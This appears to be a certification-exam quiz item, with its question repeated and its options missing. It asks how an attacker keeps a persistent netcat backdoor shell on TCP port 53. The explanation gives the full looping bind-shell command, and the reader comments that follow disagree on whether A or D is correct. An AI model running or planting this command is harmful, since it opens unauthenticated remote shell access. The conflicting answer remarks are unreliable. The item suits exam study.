How could an attacker set up a persistent backdoor listener to a login shell on TCP port 53 using netcat on a Linux system?
How could an attacker set up a persistent backdoor listener to a login shell on TCP port 53 using netcat on a Linux system?
To set up a persistent backdoor listener on TCP port 53 using netcat, the command should run continuously to ensure persistence. The command 'while true; do nc -l -p 53 -e /bin/sh; done' sets up an infinite loop that repeatedly starts a netcat listener on port 53, which executes a shell when a connection is made, thus maintaining persistence.
Answer should be D because of word "Persistent"
correct answer A
persistent = while true